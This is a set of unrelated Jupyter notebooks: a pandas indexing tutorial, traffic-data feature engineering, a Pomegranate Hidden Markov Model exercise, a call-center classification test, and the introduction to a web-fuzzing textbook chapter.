```
## Removing Columns
```
# axis=1 because it's a column
df.drop('new',axis=1)
# Not inplace unless reassigned!
df
df = df.drop('new',axis=1)
df
```
## Working with Rows
## Selecting one row by name
```
df.loc['A']
```
## Selecting multiple rows by name
```
df.loc[['A','C']]
```
## Select single row by integer index location
```
df.iloc[0]
```
## Select multiple rows by integer index location
```
df.iloc[0:2]
```
## Remove row by name
```
df.drop('C',axis=0)
# NOT IN PLACE!
df
```
### Selecting subset of rows and columns at same time
```
df.loc[['A','C'],['W','Y']]
```
# Conditional Selection
An important feature of pandas is conditional selection using bracket notation, very similar to numpy:
```
df
df>0
df[df>0]
df['X']>0
df[df['X']>0]
df[df['X']>0]['Y']
df[df['X']>0][['Y','Z']]
```
For two conditions you can use | and & with parentheses:
```
df[(df['W']>0) & (df['Y'] > 1)]
```
## More Index Details
Let's discuss some more features of indexing, including resetting the index or setting it to something else. We'll also talk about index hierarchy!
```
df
# Reset to default 0,1...n index
df.reset_index()
df
newind = 'CA NY WY OR CO'.split()
newind
df['States'] = newind
df
df.set_index('States')
df
df = df.set_index('States')
df
```
## DataFrame Summaries
There are a couple of ways to obtain summary data on DataFrames.<br>
<tt><strong>df.describe()</strong></tt> provides summary statistics on all numerical columns.<br>
<tt><strong>df.info() and df.dtypes</strong></tt> display the data type of all columns.
```
df.describe()
df.dtypes
df.info()
```
# Great Job!
|
github_jupyter
|
```
# general tools
import warnings
import requests
import pickle
import math
import re
# visualization tools
import matplotlib.pyplot as plt
from tqdm.auto import tqdm
import seaborn as sns
# data preprocessing tools
import pandas as pd
from shapely.geometry import Point
import numpy as np
from scipy.spatial.distance import cdist
tqdm.pandas()
plt.style.use('seaborn')
warnings.filterwarnings("ignore")
%run ../src/utils.py
traffic = pd.read_csv('../data/external/Traffic_Published_2016.csv')
traffic.shape
traffic.info()
traffic = traffic.dropna(subset=['Lat'])
traffic.shape
train = pd.read_csv('../data/raw/data_train.zip', index_col='Unnamed: 0', low_memory=True)
test = pd.read_csv('../data/raw/data_test.zip', index_col='Unnamed: 0', low_memory=True)
train.shape, test.shape
data = pd.concat([train, test], axis=0)
data.shape
import pyproj
converter = pyproj.Proj("+proj=merc +lat_ts=0 +lat_0=0 +lon_0=0 +x_0=0 \
+y_0=0 +ellps=WGS84 +datum=WGS84 +units=m +no_defs")
data['lat_lon_entry'] = [converter(x, y, inverse=True) for x, y in zip(data.x_entry, data.y_entry)]
data['lat_entry'] = data.lat_lon_entry.apply(lambda row: row[0])
data['lon_entry'] = data.lat_lon_entry.apply(lambda row: row[1])
data['lat_lon_exit'] = [converter(x, y, inverse=True) for x, y in zip(data.x_exit, data.y_exit)]
data['lat_exit'] = data.lat_lon_exit.apply(lambda row: row[0])
data['lon_exit'] = data.lat_lon_exit.apply(lambda row: row[1])
data['euclidean_distance'] = euclidean(data.x_entry.values, data.y_entry.values,
data.x_exit.values, data.y_exit.values)
from math import hypot
from scipy.spatial.distance import cdist
from tqdm import tqdm
traffic = traffic.reset_index(drop=True)
coords_traff = list(zip(traffic.Lat.values, traffic.Long.values))
data['idx_traffic'] = np.zeros(data.shape[0])
df_copy = data.copy()
df_copy = df_copy[df_copy.euclidean_distance!=0]
df_copy = df_copy.reset_index(drop=True)
def minimum_distance(data, row_type='entry'):
for idx, (lat, long) in tqdm(enumerate(list(zip(data['lat_'+row_type].values, data['lon_'+row_type].values)))):
idx_traffic = cdist([(lat, long)], coords_traff).argmin()
data.loc[idx, 'idx_traffic'] = idx_traffic
return data
df_copy = minimum_distance(df_copy, row_type='exit')
df_copy['idx_traffic'] = df_copy.idx_traffic.astype(int)
df_copy.head(4)
traffic_cols = traffic.columns.tolist()
traffic = traffic.reset_index(drop=False)
#traffic.columns = ['idx_traffic']+[traffic_cols]
df_copy['index'] = df_copy.idx_traffic.values
df_final = df_copy.merge(traffic, on='index')
df_final.head(4)
final_columns = list(set(traffic.columns.tolist()) - set(['level_0', 'index']))
final_columns += ['hash', 'trajectory_id']
for col in final_columns:
if col not in ['hash', 'trajectory_id']:
df_final = df_final.rename(index=str, columns={col: col+'_exit'})
df_final.head(4)
final_columns = ['hash', 'trajectory_id'] + [col+'_exit' for col in final_columns if col not in ['hash', 'trajectory_id']]
df_final[final_columns].head(4)
df_final = df_final.drop('COUNTY_NAME_exit', axis=1)
final_columns = list(set(final_columns) - set(['COUNTY_NAME_exit']))
df_final[final_columns].to_hdf('../data/external/traffic_exit_features.hdf', key='exit', mode='w')
```
From this point, we will perform a round of exploration and visualization regarding the newfound external data.
```
traffic_exit = pd.read_hdf('../data/raw/traffic_exit_features.hdf', key='exit', mode='r')
traffic_entry = pd.read_hdf('../data/raw/traffic_entry_features.hdf', key='entry', mode='r')
traffic_entry.shape, traffic_exit.shape
traffic_entry.head(4).T
```
- AADT: Annual Average Daily Traffic, the total volume of vehicle traffic on a roadway for a year divided by 365 days.
- K_FACTOR: the proportion of annual average daily traffic occurring in a single hour. This factor is used for designing and analyzing the flow of traffic on highways.
- ROUTE_ID: integer value identifying each road in the state of Georgia's road network.
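Since K_FACTOR is the share of AADT falling in the peak (design) hour, a design-hour volume can be sketched as their product; the numbers below are made up for illustration:

```python
def design_hour_volume(aadt, k_factor_percent):
    """Vehicles in the design hour: AADT times the K factor (given in percent)."""
    return aadt * k_factor_percent / 100.0

# e.g. an AADT of 30,000 vehicles/day with a K factor of 9.5%
print(design_hour_volume(30_000, 9.5))  # 2850.0 vehicles/hour
```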
```
# custom RGB color used below: 29.8% red, 74.1% green, 74.9% blue
fig, ax = plt.subplots(2, 1, figsize=(18, 15))
sns.set_style("whitegrid")
sns.distplot(traffic_entry.AADT_entry.dropna().values,
kde=False,
hist_kws={"linewidth": 3,
"alpha": 1,
"color": "coral"},
ax=ax[0])
sns.distplot(traffic_entry.K_FACTOR_entry.dropna().values,
kde=False,
hist_kws={"linewidth": 3,
"alpha": 1,
"color": [(0.298, 0.741, 0.749)]},
ax=ax[1])
ax[0].set_title('Annual Average Daily Traffic Distribution', fontsize=30)
ax[1].set_title('K-Factor: Proportion of annual average daily traffic occurring in an hour',
fontsize=30)
ax[0].set_xlim(0, 150000)
ax[1].set_xlim(0, 25)
ax[0].grid(False)
ax[1].grid(False)
ax[0].tick_params(axis='both', which='major', labelsize=20)
ax[1].tick_params(axis='both', which='major', labelsize=20)
traffic_entry.AADT_entry.hist(bins=100)
traffic_entry.K_FACTOR_entry.hist(bins=100)
sns.countplot(x='ROUTE_ID_entry', data=traffic_entry)
```
|
github_jupyter
|
# Intro to Hidden Markov Models (optional)
---
### Introduction
In this notebook, you'll use the [Pomegranate](http://pomegranate.readthedocs.io/en/latest/index.html) library to build a simple Hidden Markov Model and explore the Pomegranate API.
<div class="alert alert-block alert-info">
**Note:** You are not required to complete this notebook and it will not be submitted with your project, but it is designed to quickly introduce the relevant parts of the Pomegranate library that you will need to complete the part of speech tagger.
</div>
The notebook already contains some code to get you started. You only need to add some new functionality in the areas indicated; you will not need to modify the included code beyond what is requested. Sections that begin with **'IMPLEMENTATION'** in the header indicate that you need to fill in code in the block that follows. Instructions will be provided for each section, and the specifics of the implementation are marked in the code block with a 'TODO' statement. Please be sure to read the instructions carefully!
<div class="alert alert-block alert-info">
**Note:** Code and Markdown cells can be executed using the `Shift + Enter` keyboard shortcut. Markdown cells can be edited by double-clicking the cell to enter edit mode.
</div>
<hr>
<div class="alert alert-block alert-warning">
**Note:** Make sure you have selected a **Python 3** kernel in Workspaces or the hmm-tagger conda environment if you are running the Jupyter server on your own machine.
</div>
```
# Jupyter "magic methods" -- only need to be run once per kernel restart
%load_ext autoreload
%aimport helpers
%autoreload 1
# import python modules -- this cell needs to be run again if you make changes to any of the files
import matplotlib.pyplot as plt
import numpy as np
from helpers import show_model
from pomegranate import State, HiddenMarkovModel, DiscreteDistribution
```
## Build a Simple HMM
---
You will start by building a simple HMM network based on an example from the textbook [Artificial Intelligence: A Modern Approach](http://aima.cs.berkeley.edu/).
> You are the security guard stationed at a secret under-ground installation. Each day, you try to guess whether it’s raining today, but your only access to the outside world occurs each morning when you see the director coming in with, or without, an umbrella.
A simplified diagram of the required network topology is shown below.

### Describing the Network
<div class="alert alert-block alert-warning">
$\lambda = (A, B)$ specifies a Hidden Markov Model in terms of a state transition probability distribution $A$ and an emission probability distribution $B$.
</div>
HMM networks are parameterized by two distributions: the emission probabilities giving the conditional probability of observing evidence values for each hidden state, and the transition probabilities giving the conditional probability of moving between states during the sequence. Additionally, you can specify an initial distribution describing the probability of a sequence starting in each state.
<div class="alert alert-block alert-warning">
At each time $t$, $X_t$ represents the hidden state, and $Y_t$ represents an observation at that time.
</div>
In this problem, $t$ corresponds to each day of the week and the hidden state represent the weather outside (whether it is Rainy or Sunny) and observations record whether the security guard sees the director carrying an umbrella or not.
For example, during some particular week the guard may observe an umbrella ['yes', 'no', 'yes', 'no', 'yes'] on Monday-Friday, while the weather outside is ['Rainy', 'Sunny', 'Sunny', 'Sunny', 'Rainy']. In that case, $t=Wednesday$, $Y_{Wednesday}=yes$, and $X_{Wednesday}=Sunny$. (It might be surprising that the guard would observe an umbrella on a sunny day, but it is possible under this type of model.)
### Initializing an HMM Network with Pomegranate
The Pomegranate library supports [two initialization methods](http://pomegranate.readthedocs.io/en/latest/HiddenMarkovModel.html#initialization). You can either explicitly provide the three distributions, or you can build the network line-by-line. We'll use the line-by-line method for the example network, but you're free to use either method for the part of speech tagger.
```
# create the HMM model
model = HiddenMarkovModel(name="Example Model")
```
### **IMPLEMENTATION**: Add the Hidden States
When the HMM model is specified line-by-line, the object starts as an empty container. The first step is to name each state and attach an emission distribution.
#### Observation Emission Probabilities: $P(Y_t | X_t)$
We need to assume that we have some prior knowledge (possibly from a data set) about the director's behavior to estimate the emission probabilities for each hidden state. In real problems you can often estimate the emission probabilities empirically, which is what we'll do for the part of speech tagger. Our imaginary data will produce the conditional probability table below. (Note that the rows sum to 1.0)
| | $yes$ | $no$ |
| --- | --- | --- |
| $Sunny$ | 0.10 | 0.90 |
| $Rainy$ | 0.80 | 0.20 |
```
# create the HMM model
model = HiddenMarkovModel(name="Example Model")
# emission probability distributions, P(umbrella | weather)
sunny_emissions = DiscreteDistribution({"yes": 0.1, "no": 0.9})
sunny_state = State(sunny_emissions, name="Sunny")
# TODO: create a discrete distribution for the rainy emissions from the probability table
# above & use that distribution to create a state named Rainy
rainy_emissions = DiscreteDistribution({"yes": 0.8, "no": 0.2})
rainy_state = State(rainy_emissions, name="Rainy")
# add the states to the model
model.add_states(sunny_state, rainy_state)
assert rainy_emissions.probability("yes") == 0.8, "The director brings his umbrella with probability 0.8 on rainy days"
print("Looks good so far!")
```
### **IMPLEMENTATION:** Adding Transitions
Once the states are added to the model, we can build up the desired topology of individual state transitions.
#### Initial Probability $P(X_0)$:
We will assume that we don't know anything useful about the likelihood of a sequence starting in either state. If the sequences start each week on Monday and end each week on Friday (so each week is a new sequence), then this assumption means that it's equally likely that the weather on a Monday may be Rainy or Sunny. We can assign equal probability to each starting state by setting $P(X_0=Rainy) = 0.5$ and $P(X_0=Sunny)=0.5$:
| $Sunny$ | $Rainy$ |
| --- | --- |
| 0.5 | 0.5 |
#### State transition probabilities $P(X_{t} | X_{t-1})$
Finally, we will assume for this example that we can estimate transition probabilities from something like historical weather data for the area. In real problems you can often use the structure of the problem (like a language grammar) to impose restrictions on the transition probabilities, then re-estimate the parameters with the same training data used to estimate the emission probabilities. Under this assumption, we get the conditional probability table below. (Note that the rows sum to 1.0)
| | $Sunny$ | $Rainy$ |
| --- | --- | --- |
|$Sunny$| 0.80 | 0.20 |
|$Rainy$| 0.40 | 0.60 |
```
# create edges for each possible state transition in the model
# equal probability of a sequence starting on either a rainy or sunny day
model.add_transition(model.start, sunny_state, 0.5)
model.add_transition(model.start, rainy_state, 0.5)
# add sunny day transitions (we already know estimates of these probabilities
# from the problem statement)
model.add_transition(sunny_state, sunny_state, 0.8) # 80% sunny->sunny
model.add_transition(sunny_state, rainy_state, 0.2) # 20% sunny->rainy
# TODO: add rainy day transitions using the probabilities specified in the transition table
model.add_transition(rainy_state, sunny_state, 0.4) # 40% rainy->sunny
model.add_transition(rainy_state, rainy_state, 0.6) # 60% rainy->rainy
# finally, call the .bake() method to finalize the model
model.bake()
assert model.edge_count() == 6, "There should be two edges from model.start, two from Rainy, and two from Sunny"
assert model.node_count() == 4, "The states should include model.start, model.end, Rainy, and Sunny"
print("Great! You've finished the model.")
```
## Visualize the Network
---
We have provided a helper function called `show_model()` that generates a PNG image from a Pomegranate HMM network. You can specify an optional filename to save the file to disk. Setting the "show_ends" argument to True will add the model start & end states that are included in every Pomegranate network.
```
show_model(model, figsize=(5, 5), filename="example.png", overwrite=True, show_ends=False)
```
### Checking the Model
The states of the model can be accessed using array syntax on the `HMM.states` attribute, and the transition matrix can be accessed by calling `HMM.dense_transition_matrix()`. Element $(i, j)$ encodes the probability of transitioning from state $i$ to state $j$. For example, with the default column order specified, element $(2, 1)$ gives the probability of transitioning from "Rainy" to "Sunny", which we specified as 0.4.
Run the next cell to inspect the full state transition matrix.
```
column_order = ["Example Model-start", "Sunny", "Rainy", "Example Model-end"] # Override the Pomegranate default order
column_names = [s.name for s in model.states]
order_index = [column_names.index(c) for c in column_order]
# re-order the rows/columns to match the specified column order
transitions = model.dense_transition_matrix()[:, order_index][order_index, :]
print("The state transition matrix, P(Xt|Xt-1):\n")
print(transitions)
print("\nThe transition probability from Rainy to Sunny is {:.0f}%".format(100 * transitions[2, 1]))
```
## Inference in Hidden Markov Models
---
Before moving on, we'll use this simple network to quickly go over the Pomegranate API to perform the three most common HMM tasks:
<div class="alert alert-block alert-info">
**Likelihood Evaluation**<br>
Given a model $\lambda=(A,B)$ and a set of observations $Y$, determine $P(Y|\lambda)$, the likelihood of observing that sequence from the model
</div>
We can use the weather prediction model to evaluate the likelihood of the sequence [yes, yes, yes, yes, yes] (or any other state sequence). The likelihood is often used in problems like machine translation to weight interpretations in conjunction with a statistical language model.
<div class="alert alert-block alert-info">
**Hidden State Decoding**<br>
Given a model $\lambda=(A,B)$ and a set of observations $Y$, determine $Q$, the most likely sequence of hidden states in the model to produce the observations
</div>
We can use the weather prediction model to determine the most likely sequence of Rainy/Sunny states for a known observation sequence, like [yes, no] -> [Rainy, Sunny]. We will use decoding in the part of speech tagger to determine the tag for each word of a sentence. The decoding can be further split into "smoothing" when we want to calculate past states, "filtering" when we want to calculate the current state, or "prediction" if we want to calculate future states.
<div class="alert alert-block alert-info">
**Parameter Learning**<br>
Given a model topography (set of states and connections) and a set of observations $Y$, learn the transition probabilities $A$ and emission probabilities $B$ of the model, $\lambda=(A,B)$
</div>
We don't need to learn the model parameters for the weather problem or POS tagging, but it is supported by Pomegranate.
### IMPLEMENTATION: Calculate Sequence Likelihood
Calculating the likelihood of an observation sequence from an HMM network is performed with the [forward algorithm](https://en.wikipedia.org/wiki/Forward_algorithm). Pomegranate provides the `HMM.forward()` method to calculate the full matrix showing the likelihood of aligning each observation to each state in the HMM, and the `HMM.log_probability()` method to calculate the cumulative likelihood over all possible hidden state paths that the specified model generated the observation sequence.
Fill in the code in the next section with a sample observation sequence and then use the `forward()` and `log_probability()` methods to evaluate the sequence.
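As an independent cross-check of what Pomegranate computes, the forward recursion for this two-state model can be written directly in NumPy, using the tables given above (state order [Sunny, Rainy]):

```python
import numpy as np

start = np.array([0.5, 0.5])                    # P(X0)
trans = np.array([[0.8, 0.2], [0.4, 0.6]])      # P(Xt | Xt-1), rows = previous state
emit = {"yes": np.array([0.1, 0.8]), "no": np.array([0.9, 0.2])}

def forward_likelihood(obs):
    """P(obs | model) summed over all hidden state paths (forward algorithm)."""
    alpha = start * emit[obs[0]]
    for o in obs[1:]:
        alpha = (alpha @ trans) * emit[o]       # propagate, then weight by emission
    return alpha.sum()

print(forward_likelihood(["yes", "no", "yes"]))  # ≈ 0.0692
```

This should agree with `np.exp(model.log_probability(['yes', 'no', 'yes']))` from the cell below.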
```
# TODO: input a sequence of 'yes'/'no' values in the list below for testing
observations = ['yes', 'no', 'yes']
assert len(observations) > 0, "You need to choose a sequence of 'yes'/'no' observations to test"
# TODO: use model.forward() to calculate the forward matrix of the observed sequence,
# and then use np.exp() to convert from log-likelihood to likelihood
forward_matrix = np.exp(model.forward(observations))
# TODO: use model.log_probability() to calculate the all-paths likelihood of the
# observed sequence and then use np.exp() to convert log-likelihood to likelihood
probability_percentage = np.exp(model.log_probability(observations))
# Display the forward probabilities
print(" " + "".join(s.name.center(len(s.name)+6) for s in model.states))
for i in range(len(observations) + 1):
print(" <start> " if i==0 else observations[i - 1].center(9), end="")
print("".join("{:.0f}%".format(100 * forward_matrix[i, j]).center(len(s.name) + 6)
for j, s in enumerate(model.states)))
print("\nThe likelihood over all possible paths " + \
"of this model producing the sequence {} is {:.2f}%\n\n"
.format(observations, 100 * probability_percentage))
```
### IMPLEMENTATION: Decoding the Most Likely Hidden State Sequence
The [Viterbi algorithm](https://en.wikipedia.org/wiki/Viterbi_algorithm) calculates the single path with the highest likelihood to produce a specific observation sequence. Pomegranate provides the `HMM.viterbi()` method to calculate both the hidden state sequence and the corresponding likelihood of the Viterbi path.
This is called "decoding" because we use the observation sequence to decode the corresponding hidden state sequence. In the part of speech tagging problem, the hidden states map to parts of speech and the observations map to sentences. Given a sentence, Viterbi decoding finds the most likely sequence of part of speech tags corresponding to the sentence.
Fill in the code in the next section with the same sample observation sequence you used above, and then use the `model.viterbi()` method to calculate the likelihood and most likely state sequence. Compare the Viterbi likelihood against the forward algorithm likelihood for the observation sequence.
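The same model admits a compact NumPy Viterbi, again only as an independent sketch of what `model.viterbi()` computes (ties between equally likely paths are broken by `argmax`, so the reported path is one of possibly several optima):

```python
import numpy as np

states = ["Sunny", "Rainy"]
start = np.array([0.5, 0.5])
trans = np.array([[0.8, 0.2], [0.4, 0.6]])      # rows = previous state
emit = {"yes": np.array([0.1, 0.8]), "no": np.array([0.9, 0.2])}

def viterbi(obs):
    """Return one most likely hidden-state path and its probability."""
    delta = start * emit[obs[0]]
    back = []
    for o in obs[1:]:
        scores = delta[:, None] * trans         # scores[i, j]: come from i, go to j
        back.append(scores.argmax(axis=0))      # best predecessor for each state
        delta = scores.max(axis=0) * emit[o]
    path = [int(delta.argmax())]                # best final state
    for ptr in reversed(back):                  # walk the backpointers
        path.append(int(ptr[path[-1]]))
    return [states[i] for i in reversed(path)], delta.max()

path, prob = viterbi(["yes", "no", "yes"])
print(path, prob)  # a path with probability ≈ 0.0230
```

Note the Viterbi probability (single best path) is smaller than the forward likelihood for the same sequence, which sums over all paths.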
```
# TODO: input a sequence of 'yes'/'no' values in the list below for testing
observations = ['yes', 'no', 'yes']
# TODO: use model.viterbi to find the sequence likelihood & the most likely path
viterbi_likelihood, viterbi_path = model.viterbi(observations)
print("The most likely weather sequence to have generated " + \
"these observations is {} at {:.2f}%."
.format([s[1].name for s in viterbi_path[1:]], np.exp(viterbi_likelihood)*100)
)
```
### Forward likelihood vs Viterbi likelihood
Run the cells below to see the likelihood of each sequence of observations with length 3, and compare them with the Viterbi path.
```
from itertools import product
observations = ['no', 'no', 'yes']
p = {'Sunny': {'Sunny': np.log(.8), 'Rainy': np.log(.2)}, 'Rainy': {'Sunny': np.log(.4), 'Rainy': np.log(.6)}}
e = {'Sunny': {'yes': np.log(.1), 'no': np.log(.9)}, 'Rainy':{'yes':np.log(.8), 'no':np.log(.2)}}
o = observations
k = []
vprob = np.exp(model.viterbi(o)[0])
print("The likelihood of observing {} if the weather sequence is...".format(o))
for s in product(*[['Sunny', 'Rainy']]*3):
k.append(np.exp(np.log(.5)+e[s[0]][o[0]] + p[s[0]][s[1]] + e[s[1]][o[1]] + p[s[1]][s[2]] + e[s[2]][o[2]]))
print("\t{} is {:.2f}% {}".format(s, 100 * k[-1], " <-- Viterbi path" if k[-1] == vprob else ""))
print("\nThe total likelihood of observing {} over all possible paths is {:.2f}%".format(o, 100*sum(k)))
```
### Congratulations!
You've now finished the HMM warmup. You should have all the tools you need to complete the part of speech tagger project.
# Keyrus Data Science Technical Test
## Part 1: Exploratory Analysis
- [x] Variable types
- [x] Measures of central tendency
- [x] Measures of dispersion
- [x] Missing value treatment
- [x] Plots
- [x] Outlier analysis
## Part 2: Statistics
- [x] Descriptive statistics
- [x] Identifying the distributions of the variables
## Part 3: Modeling
- [x] Prediction models
- [x] Best model selection
- [x] Evaluation of results
- [x] Metrics
## Imports
```
# Data analysis and data wrangling
import numpy as np
import pandas as pd
# Plotting
import seaborn as sns
import matplotlib.pyplot as plt
import missingno as msno # missing values
# Preprocessing
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import PolynomialFeatures
# Machine Learning
from sklearn.ensemble import RandomForestClassifier
from sklearn.ensemble import RandomForestRegressor
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import Ridge
# Metrics
from sklearn.model_selection import KFold
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import cross_val_score
# Other
from IPython.display import Image
import configparser
import warnings
import os
import time
import pprint
```
## Preparing the Working Directory
```
def prepare_directory_work(end_directory: str = 'notebooks'):
    # Current path
    curr_dir = os.path.dirname(os.path.realpath("__file__"))
    if curr_dir.endswith(end_directory):
        os.chdir('..')
        return curr_dir
    return f'Current working directory: {curr_dir}'
prepare_directory_work(end_directory='notebooks')
```
## Cell Format
```
config = configparser.ConfigParser()
config.read('src/visualization/plot_config.ini')
figure_titlesize = config['figure']['figure_titlesize']
figure_figsize_large = int(config['figure']['figure_figsize_large'])
figure_figsize_width = int(config['figure']['figure_figsize_width'])
figure_dpi = int(config['figure']['figure_dpi'])
figure_facecolor = config['figure']['figure_facecolor']
figure_autolayout = bool(config['figure']['figure_autolayout'])
font_family = config['font']['font_family']
font_size = int(config['font']['font_size'])
legend_loc = config['legend']['legend_loc']
legend_fontsize = int(config['legend']['legend_fontsize'])
# Customizing file matplotlibrc
# Figure
plt.rcParams['figure.titlesize'] = figure_titlesize
plt.rcParams['figure.figsize'] = [figure_figsize_large, figure_figsize_width]
plt.rcParams['figure.dpi'] = figure_dpi
plt.rcParams['figure.facecolor'] = figure_facecolor
plt.rcParams['figure.autolayout'] = figure_autolayout
# Font
plt.rcParams['font.family'] = font_family
plt.rcParams['font.size'] = font_size
# Legend
plt.rcParams['legend.loc'] = legend_loc
plt.rcParams['legend.fontsize'] = legend_fontsize
# Guarantee that plots render inside the Jupyter notebook
%matplotlib inline
# Load the "autoreload" extension so that code can change
%load_ext autoreload
# Format all floats with 6 significant digits
pd.set_option('display.float_format', '{:.6}'.format)
# Show all rows and all columns
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
# Suppress unnecessary warnings so that the presentation looks clean
warnings.filterwarnings('ignore')
```
## Loading the Data
```
%%time
df_callcenter = pd.read_csv('data/cleansing/callcenter_marketing_clenning.csv',
encoding='utf8',
delimiter=',',
verbose=True)
df_callcenter.info()
```
Note: loading takes almost half the time compared to the original version of the CSV file.
---
## Global Variables
```
# Lists that will be manipulated in the data processing
list_columns = []
list_categorical_col = []
list_numerical_col = []
list_without_target_col = []
def get_col(df: pd.DataFrame = None,
            type_descr=np.number) -> list:
    """
    Return a list of column names matching the given dtype(s).
    Args:
        type_descr:
            [np.object, np.number] -> return all columns
            np.number -> return the numerical columns
            np.object -> return the object (categorical) columns
    """
    try:
        col = df.describe(include=type_descr).columns  # pandas Index
    except ValueError:
        print(f'Dataframe does not contain {type_descr} columns!', end='\n')
    else:
        return col.tolist()
def get_col_without_target(df: pd.DataFrame,
                           list_columns: list,
                           target_col: str) -> list:
    """Return a copy of list_columns with the target column removed."""
    col_target = list_columns.copy()
    col_target.remove(target_col)
    return col_target
list_numerical_col = get_col(df=df_callcenter,
type_descr=np.number)
list_categorical_col = get_col(df=df_callcenter,
type_descr=np.object)
list_columns = get_col(df=df_callcenter,
type_descr=[np.object, np.number])
list_without_target_col = get_col_without_target(df=df_callcenter,
list_columns=list_columns,
target_col='resultado')
```
## Training and Testing Dataset
- Metric: cross-validation score
```
def cross_val_model(X, y, model, n_splits=3):
    'Split the dataset with stratified k-fold and compute the cross-validation score'
    print("Begin training", end='\n\n')
start = time.time()
X = np.array(X)
y = np.array(y)
folds = list(StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=2017).split(X, y))
for j, (train_idx, test_idx) in enumerate(folds):
X_train = X[train_idx]
y_train = y[train_idx]
X_holdout = X[test_idx]
y_holdout = y[test_idx]
        print("Fit %s fold %d" % (str(model).split('(')[0], j + 1))
model.fit(X_train, y_train)
cross_score = cross_val_score(model, X_holdout, y_holdout, cv=3, scoring='roc_auc')
print("\tcross_score: %.5f" % cross_score.mean())
end = time.time()
print("\nTraining done! Time Elapsed:", end - start, " seconds.")
# training model
X = df_callcenter[list_without_target_col]
y = df_callcenter['resultado'] # target
```
---
## Prediction Models
- Baseline model
- Benchmarks
### Baseline Model
- We start with a baseline that is as simple as possible.
#### Linear Regression
```
# training model
X = df_callcenter[list_without_target_col]
y = df_callcenter['resultado']
print(X.shape)
print(y.shape)
# Visualize params
LinearRegression(n_jobs=-1)
# create model
lr_model = LinearRegression(n_jobs=-1, normalize=False)
# split dataset and calculate cross_score
cross_val_model(X, y, lr_model)
```
#### Linear Regression with Regularization
```
# create model
lr_ridge_model = Ridge()
# split dataset and calculate cross_score
cross_val_model(X, y, lr_ridge_model)
```
#### Polynomial Regression
```
poly = PolynomialFeatures(degree=2)
X_poly = poly.fit_transform(X)
print(X_poly.shape)
# split dataset and calculate cross_score
cross_val_model(X_poly, y, lr_model)
```
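To make the effect of `PolynomialFeatures(degree=2)` concrete: a degree-2 expansion of features `[a, b]` yields `[1, a, b, a*a, a*b, b*b]`. The following standard-library sketch mirrors scikit-learn's ordering; `poly_features` is a hypothetical helper written for illustration, not part of this notebook.

```python
from itertools import combinations_with_replacement

def poly_features(row, degree=2):
    """Expand a feature row into all monomials up to `degree`,
    mirroring sklearn's PolynomialFeatures (include_bias=True)."""
    out = []
    for d in range(degree + 1):
        for combo in combinations_with_replacement(range(len(row)), d):
            term = 1
            for i in combo:
                term *= row[i]
            out.append(term)
    return out

# [a, b] = [2, 3] with degree 2 -> [1, a, b, a*a, a*b, b*b]
print(poly_features([2, 3]))  # [1, 2, 3, 4, 6, 9]
```

This also explains why `X_poly` above has far more columns than `X`: the number of degree-2 features grows quadratically with the number of inputs.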
### Benchmarks
#### RandomForest
```
# Visualize params
RandomForestClassifier()
# RandomForest params dict
rf_params_one = {}
rf_params_one['n_estimators'] = 10
rf_params_one['max_depth'] = 10
rf_params_one['min_samples_split'] = 10
rf_params_one['min_samples_leaf'] = 10  # each leaf must hold at least 10 samples
rf_params_one['n_jobs'] = -1  # use all available processors
# create model
rf_model_one = RandomForestClassifier(**rf_params_one)
# training model
X = df_callcenter[list_without_target_col]
y = df_callcenter['resultado']
# split dataset and calculate cross_score
cross_val_model(X, y, rf_model_one)
# RandomForest params dict
rf_params_two = {}
rf_params_two['n_estimators'] = 1
rf_params_two['max_depth'] = len(list_numerical_col)*2
rf_params_two['min_samples_split'] = len(list_numerical_col)
rf_params_two['min_samples_leaf'] = len(list_numerical_col)
rf_params_two['n_jobs'] = -1  # use all available processors
# create model
rf_model = RandomForestClassifier(**rf_params_two, criterion='entropy')
# training model
X = df_callcenter[list_without_target_col]
y = df_callcenter['resultado']
# split dataset and calculate cross_score
cross_val_model(X, y, rf_model)
```
#### Random Forest Regressor
```
# Visualize params
RandomForestRegressor()
# 1st Random Forest model
rf_regressor_one = RandomForestRegressor(n_jobs = -1,
verbose = 0)
# split dataset and calculate cross_score
cross_val_model(X, y, rf_regressor_one)
# 2nd Random Forest model
rf_regressor_two = RandomForestRegressor(n_estimators = 1000,
max_leaf_nodes = len(list_numerical_col)*8,
min_samples_leaf = len(list_numerical_col),
max_depth = len(list_numerical_col)*4,
n_jobs = -1,
verbose = 0)
# split dataset and calculate cross_score
cross_val_model(X, y, rf_regressor_two)
```
---
## Choosing the Best Model
Based on the cross-validation score, the chosen model is the **random forest regressor** with the parameters of the 2nd model, which achieved a score > 0.84.
---
#### Copyright
<a rel="license" href="http://creativecommons.org/licenses/by-sa/4.0/">
<img alt="Creative Commons License" align="right" style="border-width:0" src="https://i.creativecommons.org/l/by-sa/4.0/88x31.png" />
</a>
This work by Bruno A. R. M. Campos is licensed under a [Creative Commons license](http://creativecommons.org/licenses/by-sa/4.0/).
# Testing Web Applications
In this chapter, we explore how to generate tests for Graphical User Interfaces (GUIs), notably on Web interfaces. We set up a (vulnerable) Web server and demonstrate how to systematically explore its behavior – first with hand-written grammars, then with grammars automatically inferred from the user interface. We also show how to conduct systematic attacks on these servers, notably with code and SQL injection.
```
from bookutils import YouTubeVideo
YouTubeVideo('5agY5kg8Pvk')
```
**Prerequisites**
* The techniques in this chapter make use of [grammars for fuzzing](Grammars.ipynb).
* Basic knowledge of HTML and HTTP is required.
* Knowledge of SQL databases is helpful.
## Synopsis
<!-- Automatically generated. Do not edit. -->
To [use the code provided in this chapter](Importing.ipynb), write
```python
>>> from fuzzingbook.WebFuzzer import <identifier>
```
and then make use of the following features.
This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.
### Fuzzing Web Forms
`WebFormFuzzer` demonstrates how to interact with a Web form. Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements. Support is limited to GET forms and a subset of HTML form elements.
Here's the grammar extracted for our vulnerable Web server:
```python
>>> web_form_fuzzer = WebFormFuzzer(httpd_url)
>>> web_form_fuzzer.grammar['<start>']
['<action>?<query>']
>>> web_form_fuzzer.grammar['<action>']
['/order']
>>> web_form_fuzzer.grammar['<query>']
['<item>&<name>&<email-1>&<city>&<zip>&<terms>&<submit-1>']
```
